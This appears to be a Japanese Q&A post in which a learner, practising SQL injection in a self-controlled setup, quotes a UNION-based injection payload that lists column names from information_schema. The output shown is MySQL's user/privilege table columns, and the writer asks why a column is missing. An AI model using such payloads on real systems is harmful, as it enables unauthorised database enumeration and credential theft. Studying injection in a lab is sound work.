私は個人教育のためにいくつかの SQLi に取り組んでいますが、同じ問題に直面し続けています。
次の注射剤を使用する場合
bla' union all select '1', group_concat(column_name),'3','4' FROM information_schema.columns WHERE table_name= CHAR(117, 115, 101,114) #
user というテーブルのすべての列名を取得します ->
Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routin
また、これは私自身が制御した環境であるため、テーブルに UserName という列が含まれていることを知っています。列の結果に表示されないのはなぜですか?